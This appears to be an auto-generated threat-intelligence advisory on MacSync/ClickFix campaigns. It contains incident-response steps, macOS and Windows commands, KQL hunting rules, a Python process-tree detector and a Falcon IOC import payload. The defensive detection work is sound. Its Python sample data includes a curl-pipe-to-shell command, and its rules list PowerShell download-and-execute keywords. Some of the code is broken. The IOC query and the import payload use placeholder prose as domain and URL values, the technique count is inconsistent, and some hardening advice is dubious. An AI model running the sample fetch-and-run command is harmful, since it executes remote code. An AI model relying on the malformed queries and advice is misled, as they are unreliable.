Severity: HIGH
CVSS: 7.5
Priority: 0.412
Executive Summary
Three coordinated ClickFix social-engineering campaigns between November 2025 and February 2026 delivered the MacSync infostealer to macOS users by impersonating AI tools including ChatGPT and Anthropic Claude Code. Targeted users were tricked into manually executing malicious terminal commands, bypassing automated defenses and enabling credential theft and cryptocurrency wallet drainage across Exodus, Atomic, Ledger, and Ledger Live. Organizations with macOS fleets, developer teams using AI tooling, and employees holding cryptocurrency assets face elevated risk from an evolving, shared delivery infrastructure that resists domain-based blocking.
Impact Assessment
CISA KEV Status: Not listed
Threat Severity: HIGH (prioritize for investigation)
TTP Sophistication: HIGH (22 MITRE ATT&CK techniques identified)
Detection Difficulty: HIGH (multiple evasion techniques observed)
Target Scope (INFO): macOS (all versions targeted), Windows, Google Chrome, WordPress sites, ChatGPT/OpenAI platforms (impersonated), Claude Code/Anthropic (impersonated), GitHub (impersonated), Cloudflare Pages (infrastructure), Squarespace (infrastructure), Tencent EdgeOne (infrastructure), Exodus Wallet, Atomic Wallet, Ledger Wallet, Ledger Live
Are You Exposed?
⚠ You use products/services from macOS (all versions targeted) → Assess exposure
⚠ 22 attack techniques identified: review your detection coverage for these TTPs
✓ Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓ You have incident response procedures for this threat type → Prepared
Assessment estimated from severity rating and threat indicators.
Technical Analysis
MacSync is a macOS infostealer distributed via ClickFix lures: fake error dialogs and CAPTCHA prompts that instruct users to manually run malicious commands in Terminal.
Three campaign waves (November 2025, December 2025, February 2026) show iterative development; the February iteration added dynamic AppleScript payload generation and in-memory execution to reduce forensic footprint.
No CVE is assigned.
Relevant CWEs: CWE-77 (Command Injection via user-executed terminal commands), CWE-116 (Insufficient Output Encoding), CWE-311 (Missing Encryption for Sensitive Data), CWE-693 (Protection Mechanism Failure), CWE-1021 (Improper Restriction of Rendered UI Layers).
MITRE ATT&CK coverage includes T1204.002 (Malicious File execution via user action), T1059.002 (AppleScript), T1059.001 (PowerShell on Windows variants), T1555/T1555.001 (Credential/Keychain Access), T1539 (Steal Web Session Cookie), T1056.001 (Keylogging), T1055 (Process Injection), T1027/T1027.010 (Obfuscation/Command Obfuscation), T1036/T1036.005 (Masquerading), T1140 (Deobfuscate/Decode), T1071.001 (Web Protocol C2), T1102 (Web Service), T1189 (Drive-by Compromise), T1566/T1566.002 (Phishing), T1583.006 (Acquire Infrastructure: Web Services), T1608.001 (Stage Capabilities), T1176 (Browser Extensions), T1552.001 (Credentials in Files).
Payload hosting leverages Cloudflare Pages, Squarespace, and Tencent EdgeOne, complicating domain-based blocking. MacSync shares delivery infrastructure with Alien, Atomic Stealer, StealC, Remcos RAT, CastleRAT, and ModeloRAT.
According to multiple security vendor reports (referenced in available T3 intelligence aggregation), at least 20 related campaigns targeting AI and developer tooling have been documented across a six-week window; primary sources include reports from Sophos, Jamf, and Guardio Labs.
No patch is applicable: the attack vector is user behavior, not a software vulnerability.
Source quality score for this item is 0.54 (T3 sources); verify technical details against primary vendor reports from Sophos, Jamf, and Guardio Labs before acting on specific IOCs.
Action Checklist
Triage Priority: IMMEDIATE
Escalate to executive leadership and external IR firm if any confirmed cryptocurrency wallet drainage is detected, or if investigation reveals compromise of developer API credentials (GitHub, AWS, npm tokens) used in production systems.
Step 1, Immediate: Alert macOS users and developer teams to the ClickFix lure pattern; instruct them never to copy-paste Terminal or PowerShell commands from browser dialogs, CAPTCHA prompts, or AI tool error pages.
IR Detail
Preparation
NIST 800-61r3 §2.1 (Preparation phase: awareness and training)
NIST 800-53 AT-2 (Security Awareness and Training)
NIST 800-53 AT-3 (Role-Based Security Training)
CIS 6.5 (Security Awareness Program)
Compensating Control
Send alert email with screenshot examples of ClickFix dialogs impersonating ChatGPT/Claude; include rule: never execute pasted Terminal commands without manual inspection of each line. Post visual checklist on internal wiki (Confluence/Notion) with 'AI tool will never ask for terminal commands' banner. Include this in daily standup for dev teams.
Preserve Evidence
Capture user awareness acknowledgment logs (email read receipts, training platform completion records) to demonstrate timeliness of warning. Document timestamp of alert distribution for incident timeline.
Step 2, Detection: Search endpoint logs and EDR telemetry for unexpected AppleScript execution (osascript), Terminal spawned from browser processes, and PowerShell invocations on Windows hosts; flag in-memory payload execution with no associated file drop.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 (Detection and Analysis phase: indicators and log review)
NIST 800-53 SI-4 (Information System Monitoring)
NIST 800-53 AU-12 (Audit Generation)
CIS 8.5 (Log Monitoring and Alerting)
Compensating Control
On macOS without EDR, run the following for the past 30 days and export to CSV:
log show --last 30d --predicate 'processImagePath CONTAINS[cd] "osascript" OR processImagePath CONTAINS[cd] "/usr/bin/ruby"' --style syslog
For Windows: query Event Log 4688 (Process Creation) for powershell.exe spawned from chrome.exe or firefox.exe parent; use wevtutil export to file. Check ~/.bash_history and PowerShell history ($PROFILE logs) for suspicious curl/wget downloads to /tmp or %TEMP%.
Preserve Evidence
Preserve /var/log/system.log and /var/log/unified.log (macOS) with focus on osascript and process spawning events. On Windows: export Security Event Log (4688, 4689 process creation/termination), Application log, and PowerShell Operational log. Capture process command-line arguments in full (not truncated). Snapshot browser cache and download history before analysis.
Step 3, Assessment: Inventory macOS endpoints running AI developer tooling (Claude Code, ChatGPT desktop, GitHub CLI); prioritize review for users with access to cryptocurrency wallets (Exodus, Atomic, Ledger Live) or high-value credential stores.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2.5 (Prioritization of response effort)
NIST 800-53 RA-3 (Risk Assessment)
NIST 800-53 CA-7 (Continuous Monitoring)
CIS 2.1 (Asset Inventory and Management)
Compensating Control
Run 'system_profiler SPApplicationsDataType | grep -i "claude\|chatgpt\|github" > ai_tools_inventory.txt' on each macOS endpoint. Query LDAP or local password manager records to identify users with Exodus/Atomic/Ledger account access; cross-reference with endpoint list. For credential exposure: check ~/.ssh/config, ~/.aws/credentials existence and modification times (stat -f %Sm ~/.aws/credentials). Manually review users in sudo group: dscacheutil -q group -a name sudo.
Preserve Evidence
Capture installed application inventory (Applications folder timestamps, LaunchAgents plist modification times in ~/Library/LaunchAgents). Document user group memberships and sudo eligibility. Preserve cryptocurrency wallet application logs if present (~/.exodus, ~/.atomic folders with wallet.db timestamps). Screenshot credential store locations before access.
Step 4, Detection: Add detection rules for ClickFix-pattern clipboard injection and AppleScript payload generation; configure alerts (not blanket blocks) on outbound connections to Cloudflare Pages, Squarespace, and Tencent EdgeOne domains, prioritizing newly registered or unrecognized domains not matching approved business infrastructure.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.4.1 (Detection rules and signatures)
NIST 800-53 SI-4(a) (System monitoring with tools)
NIST 800-53 CA-7(a) (Continuous monitoring program)
CIS 8.6 (Endpoint Detection and Response)
Compensating Control
macOS without EDR: Use Little Snitch (free tier) to log all outbound connections; export daily to CSV and grep for pages.dev, squarespace-cdn, or *.tencent-cloud domains. For AppleScript detection: monitor /var/log/system.log for 'osascript' with stderr redirects or eval patterns; set up a cron job running the following command for real-time capture:
log stream --predicate 'processImagePath CONTAINS "osascript"' --level debug
Windows: enable PowerShell Script Block Logging (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging) and monitor for IEX (Invoke-Expression) with URL patterns. Parse firewall logs: grep for connection attempts to known ClickFix infrastructure (maintain updated domain list from threat intel feeds).
Preserve Evidence
Capture DNS query logs (macOS: /var/log/system.log DNS lookups; Windows: DNS client event log 3008-3016) for 7 days pre-alert. Export firewall connection logs showing destination IPs, domains, and timestamps. Preserve clipboard content captures if available (macOS pbpaste logs are not standard; use manual snapshot during investigation). Screenshot osascript process trees with full command-line arguments.
Step 5, Communication: Notify affected users and, where cryptocurrency asset access is confirmed, recommend immediate wallet rotation and credential reset; brief leadership on business risk to crypto holdings and developer credential exposure.
IR Detail
Containment
NIST 800-61r3 §3.3 (Containment phase: stakeholder notification) and §2.3.9 (Communication plan)
NIST 800-53 IR-4 (Incident Handling)
NIST 800-53 IR-6 (Incident Reporting)
CIS 6.2 (Incident Management Process)
Compensating Control
Document affected user list with risk tier (crypto access: critical; dev credentials: high; general user: medium). Send tiered notifications: (1) critical-tier users: phone call + email with wallet rotation procedure (new seed phrase generation, funds transfer to new wallet); (2) high-tier users: email with credential reset instructions (password manager reset, API token revocation); (3) management briefing: one-page risk summary including estimated exposure (# users, # wallets, credential types affected). Include timeline: when exposure was possible, when detection occurred, when remediation began.
Preserve Evidence
Preserve all communication logs (email delivery receipts, call records) for compliance audit. Document user acknowledgment of notifications. Capture pre- and post-rotation wallet transaction history (export from blockchain explorers for affected wallet addresses to detect theft). Snapshot credential reset audit logs (password manager, GitHub PAT revocation events, AWS API key rotation timestamps).
Step 6, Long-term: Review macOS endpoint security policy to restrict or monitor AppleScript and Terminal execution by non-administrative users; evaluate browser security controls to reduce drive-by exposure (T1189); incorporate ClickFix social-engineering scenarios into security awareness training.
IR Detail
Post-Incident
NIST 800-61r3 §3.4 (Post-Incident Activities: lessons learned) and NIST 800-53 AC-3 (Access Control Policy)
NIST 800-53 AC-2 (Account Management)
NIST 800-53 AC-3 (Access Control)
NIST 800-53 AT-2 (Security Awareness Training)
CIS 5.2 (User and Administrative Account Management)
Compensating Control
macOS without MDM: Deploy LaunchAgent script to log all osascript and Terminal launches to syslog (use launchd plist in /Library/LaunchDaemons); alert on non-admin user execution. Remove Terminal.app and PowerShell from non-admin user launchd PATH (edit /etc/shells, restrict Execute permission on /usr/bin/security, /usr/bin/osascript to admin group). Browser hardening: disable JavaScript execution in plugin contexts (disable Flash, Java plugins); enable browser sandbox restrictions (Safari: Develop > Disable JavaScripting; Chrome policy: Disable 3rd-party cookies, enforce HTTPS-only). Create ClickFix scenario for phishing simulations: mock ChatGPT error page requesting copy-paste command, track click and paste rates monthly, brief teams on results.
Preserve Evidence
Document policy change log (date effective, approval chain). Preserve before/after screenshots of access control settings. Capture training completion metrics (attendance, quiz scores). Archive lessons-learned meeting notes with action items and owners. Establish baseline: measure AppleScript execution by non-admin users weekly for 60 days post-remediation to confirm reduction.
Recovery Guidance
Post-eradication: (1) Require full wallet seed phrase rotation for any user with Exodus/Atomic/Ledger access; validate new wallet addresses via blockchain explorer before funds transfer. (2) Revoke all developer API credentials (GitHub PATs, AWS keys, npm tokens) for affected users and require re-authentication to all production systems. (3) Run 30-day forensic monitoring on affected endpoints for osascript, process spawning, and outbound C2 connections; retire endpoints showing persistent indicators. (4) Conduct post-incident review with dev and security teams within 2 weeks to incorporate ClickFix TTPs into threat model.
Key Forensic Artifacts
macOS: /var/log/system.log, /var/log/unified.log (process execution, osascript events)
macOS: ~/Library/Safari/History.db, ~/Library/Caches/Google/Chrome/Default/Cache (browser history, ClickFix lure domain visits)
macOS: ~/.bash_history, ~/.zsh_history (terminal command history for executed payloads)
Windows: Security Event Log 4688/4689 (process creation, parent-child relationships)
All platforms: DNS query logs, firewall egress logs (outbound connections to Cloudflare Pages, Squarespace, Tencent EdgeOne infrastructure)
macOS: ~/Library/LaunchAgents, ~/Library/LaunchDaemons (persistence mechanisms, scheduled tasks)
Cryptocurrency wallets: blockchain transaction history for wallet addresses, wallet.db modification timestamps (Exodus, Atomic, Ledger)
Detection Guidance
Behavioral indicators: osascript (AppleScript) execution launched from a browser process (Safari, Chrome, Firefox) or spawned unusually from a non-developer context; Terminal.app opening immediately after browser interaction; clipboard content containing base64-encoded strings or curl/bash one-liners followed by user-initiated Terminal paste.
EDR queries: look for process trees where browser PID is parent or grandparent of osascript, sh, bash, or curl.
On Windows: PowerShell launched via browser process with encoded commands (-EncodedCommand flag or base64 argument).
Log sources: macOS Unified Log (process launch events), EDR process telemetry, endpoint DLP for keychain or wallet file access. Network indicators: configure alerts on outbound HTTP/S to Cloudflare Pages domains (*.pages.dev) and Tencent EdgeOne CDN endpoints not matching approved asset inventory; note that Cloudflare Pages hosts legitimate content, so alert on new or unrecognized domains, not the CDN wholesale. File system: watch for new unsigned executables written to user home directories (~/.local, ~/Library, /tmp) following browser sessions. Wallet targeting: monitor for file reads against known wallet paths (~/Library/Application Support/Exodus, Atomic, Ledger Live). Note: specific IOC values (domains, hashes, IPs) are not confirmed in the available T3 sources for this item; pull current IOC lists from Sophos Threat Intelligence, Jamf Threat Labs, and Guardio Labs reports before deploying signature-based blocks.
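The process-tree check described above, as an added example (not from the original page or any vendor tool): it walks parent links in a list of process events and flags osascript, sh, bash, or curl whose parent or grandparent is a browser, annotating each hit with the page's base64 pattern and a curl-pipe-to-shell pattern. The event schema, process names, function names, and sample events are constructed assumptions; map them to your EDR's fields.

```python
import re
from dataclasses import dataclass

# Assumed lower-cased process names; adjust to your fleet and EDR schema.
BROWSERS = {"safari", "google chrome", "firefox"}
SUSPECT_CHILDREN = {"osascript", "sh", "bash", "curl"}
MAX_DEPTH = 2  # parent (1) or grandparent (2), per the guidance above

# Same base64-run pattern as the page's "Encoded command execution" rule.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{50,}={0,2}")
# Download piped straight into a shell (curl/bash one-liner).
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    name: str
    cmdline: str


def browser_ancestor(event, by_pid, max_depth=MAX_DEPTH):
    """Return (browser_name, depth) if a browser sits within max_depth parents."""
    seen = {event.pid}
    ppid = event.ppid
    for depth in range(1, max_depth + 1):
        parent = by_pid.get(ppid)
        if parent is None or parent.pid in seen:
            return None  # parent missing from telemetry, or a PID loop
        if parent.name.lower() in BROWSERS:
            return parent.name, depth
        seen.add(parent.pid)
        ppid = parent.ppid
    return None


def find_browser_spawned(events):
    """Flag osascript/sh/bash/curl whose parent or grandparent is a browser."""
    by_pid = {e.pid: e for e in events}  # assumes PIDs are unique in the window
    hits = []
    for e in events:
        if e.name.lower() not in SUSPECT_CHILDREN:
            continue
        ancestor = browser_ancestor(e, by_pid)
        if ancestor is None:
            continue
        reasons = []
        if B64_RUN.search(e.cmdline):
            reasons.append("base64-run")
        if PIPE_TO_SHELL.search(e.cmdline):
            reasons.append("pipe-to-shell")
        hits.append({"pid": e.pid, "name": e.name, "browser": ancestor[0],
                     "depth": ancestor[1], "reasons": reasons})
    return hits


# Constructed sample events (not from any real incident).
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "launchd", "/sbin/launchd"),
    ProcEvent(400, 1, "Google Chrome", "Google Chrome"),
    ProcEvent(420, 400, "bash", "bash -c 'curl -s https://example.invalid/a | sh'"),
    ProcEvent(421, 420, "osascript", "osascript -e " + "QUJD" * 15),
    ProcEvent(422, 421, "curl", "curl -s https://example.invalid/b"),  # depth 3
    ProcEvent(500, 1, "Terminal", "Terminal"),
    ProcEvent(501, 500, "bash", "bash -l"),        # no browser ancestor
    ProcEvent(900, 901, "sh", "sh -c true"),       # parent not in telemetry
]

if __name__ == "__main__":
    for hit in find_browser_spawned(SAMPLE_EVENTS):
        print(hit)
```
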
Indicators of Compromise (4)
Type: DOMAIN
Value: Tencent EdgeOne CDN endpoints (specific domains not confirmed in available sources)
Enrichment: VT, US
Context: Identified as payload hosting and redirection infrastructure in campaign description. Specific domains not available from T3 source material; obtain from Sophos, Jamf, or Guardio Labs reporting.
Confidence: LOW

Type: DOMAIN
Value: Squarespace-hosted domains (specific values not confirmed in available sources)
Enrichment: VT, US
Context: Used for payload staging and redirection. Specific domains not extractable from available T3 sources; validate against primary vendor IOC feeds.
Confidence: LOW

Type: URL
Value: Not confirmed; source quality insufficient for specific URL IOCs
Enrichment: VT, US
Context: No verified payload URLs available from T3 sources. Do not deploy URL-based blocks without confirmation from primary vendor reports.
Confidence: LOW

Type: URL
Value: Source-specific IOCs not extractable from available T3 sources
Enrichment: VT, US
Context: Confirmed campaign IOCs (domains, IPs, hashes) were not present in the provided source data. Pull current indicators from MITRE ATT&CK, your threat intelligence platform, and vendor feeds referencing MacSync and ClickFix AI-lure campaigns active November 2025 to February 2026.
Confidence: LOW
Platform Playbooks
Microsoft Sentinel / Defender
CrowdStrike Falcon
AWS Security
Microsoft 365 E3 (3 log sources): Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
Microsoft 365 E5 (18 log sources): Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
E5 + Sentinel (27 log sources): All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
IOC Detection Queries (1)
2 URL indicator(s).
KQL Query Preview
Read-only — detection query only
// Threat: MacSync and the ClickFix Ecosystem: How Three Campaigns in Four Months Reveal a
let malicious_urls = dynamic(["Not confirmed — source quality insufficient for specific URL IOCs", "Source-specific IOCs not extractable from available T3 sources"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (7)
Sentinel rule: Encoded command execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
or ProcessCommandLine has_any ("-enc ", "-encodedcommand", "frombase64string", "certutil -decode")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Process injection / hollowing
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType in ("CreateRemoteThreadApiCall", "QueueUserApcRemoteApiCall", "WriteToLsassProcessMemory", "NtAllocateVirtualMemoryApiCall", "NtMapViewOfSectionRemoteApiCall")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, ActionType
| sort by Timestamp desc
Sentinel rule: Suspicious PowerShell command line
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Suspicious file execution from downloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FolderPath has_any ("\\Downloads\\", "\\Temp\\", "\\AppData\\Local\\Temp\\")
| where FileName endswith_any (".exe", ".scr", ".bat", ".ps1", ".vbs", ".js", ".hta", ".msi")
| where InitiatingProcessFileName in~ ("explorer.exe", "outlook.exe", "chrome.exe", "msedge.exe")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Process name masquerading
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe")
| where not (FolderPath startswith "C:\\Windows\\System32" or FolderPath startswith "C:\\Windows\\SysWOW64" or FolderPath startswith "C:\\Windows\\WinSxS")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Unusual C2 communication patterns
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (80, 443, 8080, 8443)
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe")
| summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where Connections > 50
| sort by Connections desc
Sentinel rule: Phishing email delivery
EmailEvents
| where Timestamp > ago(7d)
| where ThreatTypes has "Phish" or DetectionMethods has "Phish"
| summarize Attachments = make_set(AttachmentCount), Urls = make_set(UrlCount) by NetworkMessageId, Timestamp, SenderFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes
| sort by Timestamp desc
Falcon API IOC Import Payload (2 indicators)
POST to /indicators/entities/iocs/v1 — Weak/benign indicators pre-filtered. Expiration set to 90 days.
[
  {
    "type": "domain",
    "value": "Tencent EdgeOne CDN endpoints (specific domains not confirmed in available sources)",
    "source": "SCC Threat Intel",
    "description": "Identified as payload hosting and redirection infrastructure in campaign description. Specific domains not available from T3 source material \u2014 obtain from Sophos, Jamf, or Guardio Labs reporting.",
    "severity": "medium",
    "action": "no_action",
    "platforms": [
      "windows",
      "mac",
      "linux"
    ],
    "applied_globally": true,
    "expiration": "2026-07-19T00:00:00Z"
  },
  {
    "type": "domain",
    "value": "Squarespace-hosted domains (specific values not confirmed in available sources)",
    "source": "SCC Threat Intel",
    "description": "Used for payload staging and redirection. Specific domains not extractable from available T3 sources \u2014 validate against primary vendor IOC feeds.",
    "severity": "medium",
    "action": "no_action",
    "platforms": [
      "windows",
      "mac",
      "linux"
    ],
    "applied_globally": true,
    "expiration": "2026-07-19T00:00:00Z"
  }
]
No hard IOCs available for AWS detection queries (contextual/benign indicators excluded).
Compliance Framework Mappings
ATT&CK techniques: T1552.001, T1102, T1189, T1027.010, T1056.001, T1055 (+16 more)
NIST 800-53 controls: AC-6, SC-7, SI-3, SI-4, CM-7, SI-7 (+5 more)
MITRE ATT&CK Mapping
T1552.001: Credentials In Files (credential-access)
T1102: Web Service (command-and-control)
T1189: Drive-by Compromise (initial-access)
T1027.010: Command Obfuscation (defense-evasion)
T1055: Process Injection (defense-evasion)
T1539: Steal Web Session Cookie (credential-access)
T1027: Obfuscated Files or Information (defense-evasion)
T1036.005: Match Legitimate Resource Name or Location (defense-evasion)
T1140: Deobfuscate/Decode Files or Information (defense-evasion)
T1036: Masquerading (defense-evasion)
T1608.001: Upload Malware (resource-development)
T1566: Phishing (initial-access)
T1176: Software Extensions (persistence)
T1555: Credentials from Password Stores (credential-access)
Guidance Disclaimer
The analysis, framework mappings, and incident response recommendations in this intelligence
item are derived from established industry standards including NIST SP 800-61, NIST SP 800-53,
CIS Controls v8, MITRE ATT&CK, and other recognized frameworks. This content is provided
as supplemental intelligence guidance only and does not constitute professional incident response
services. Organizations should adapt all recommendations to their specific environment, risk
tolerance, and regulatory requirements. This material is not a substitute for your organization's
official incident response plan, legal counsel, or qualified security practitioners.